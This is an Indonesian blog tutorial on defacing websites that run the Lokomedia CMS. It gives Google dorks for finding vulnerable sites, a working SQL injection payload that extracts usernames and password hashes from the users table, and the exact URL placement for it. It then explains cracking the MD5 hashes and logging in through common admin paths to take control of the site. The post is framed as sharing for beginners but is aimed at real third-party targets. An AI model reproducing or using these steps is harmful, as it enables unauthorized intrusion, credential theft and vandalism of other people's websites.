Cara Deface Website Dengan SQL Lokomedia

Hallo blogger, maaf baru ngepost lagi soalnya kesibukan di dunia nyata.Kali ini saya akan ngebahas cara ngedeface website dengan celah/bug yang ada pada cms lokomedia.Berbicara soal teknik ini, pasti sudah tau di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini.


Dork : - inurl:kategori-23-hiburan.html
           - inurl:hal-tentang-kami.html
           - inurl:statis-1-pengantar.html
           - inurl:statis-19-beasiswa.html
           - inurl:statis-22-kerjasama.html

           - inurl:statis-1-profil.html

           - inurl:statis-2-profil.html

           - inurl:statis-3-strukturorganisasi.html

 
exploit vuln : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+


1.Langsung gunakan dork ke search engine google
2.Kalo sudah dapat targetnya misalnya seperti ini  http://site.com/kategori-23-hiburan.html

3.Masukan explotnya seperti ini http://site.com/kategori-23 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-hiburan.html

4.Kemudian tekan CTRL+U

5.Karena passwordnya masih dakam bentuk md5 maka harus di decrypt,saya menggunakan hashkiller bisa cari di google
6.Kemudian masukan username dan password yg tadi di dapatkan

Untuk login biasanya di :
- www.target.c0li/admin
- www.target.c0li/adminweb
- www.target.c0li/administrator
- www.target.c0li/redaktur

Nah kalo udah masuk berarti anda bisa ngubah apapun,ini hanya untuk sharing tutorial,untuk bertujuan membantu newbie seperti saya